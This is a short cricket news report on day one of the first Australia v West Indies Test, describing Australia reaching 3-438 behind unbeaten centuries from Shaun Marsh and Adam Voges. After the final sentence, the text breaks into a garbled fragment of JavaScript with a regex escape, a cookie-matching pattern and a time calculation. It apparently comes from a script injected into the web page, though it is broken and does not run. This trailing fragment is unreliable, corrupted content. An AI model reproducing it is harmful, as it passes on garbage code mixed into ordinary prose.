Australia has blasted a poor West Indies side all over the park on day one of the first Test, to reach 3-438 at stumps.

Shaun Marsh and Adam Voges were the stars of the show, remaining unbeaten on 139 and 174 respectively.

Australia scored at a brilliant run rate of 4.92, with Marsh and Voges producing some exquisite shots in the process. However, it was helped some poor Windies bowling and sluggish fielding, with Australia hitting an enormous 50 boundaries on day one.

The tone was set early in the first session, with Burns and Warner scoring at a run a ball, before Burns was bowled by a gem of a delivery by Gabriel, in the only real highlight for the day for the visitors.

Burns (33), Warner (64) and Smith (10) were all dismissed in the opening session, however, Australia managed to score 121 runs in the first session at a run rate good enough for an ODI. From there it was all Australia, with Marsh and Voges putting a 317-run partnership to effectively bat the West Indies out of the game on the first day.

As many predicted, it looks like it will be painfully one-sided Test series. "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
